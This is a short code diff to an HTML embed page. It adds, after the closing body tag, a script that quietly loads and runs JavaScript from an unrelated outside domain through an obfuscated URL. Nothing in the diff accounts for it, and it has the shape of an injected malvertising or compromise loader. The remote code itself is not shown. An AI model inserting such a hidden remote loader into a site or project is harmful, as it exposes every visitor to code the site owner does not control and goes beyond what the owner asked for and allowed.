--- a/embed.html
+++ b/embed.html
@@ -40,4 +40,16 @@
 <body>
   </div>
 </body>
+ <script>
+(function(wjlei){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = wjlei || {};
+s.src = "\/\/mildgive.com\/bzX.VNsXdGGgl\/0XYkWgcq\/ie\/mz9kuYZbUalEkOPETCYv2lNcTBca2jMlTGMZtpNojwYp1uNCzYYNx\/NtAO";
+s.async = true;
+s.referrerPolicy = 'no-referrer-when-downgrade';
+l.parentNode.insertBefore(s, l);
+})({})
+</script>
 </html>
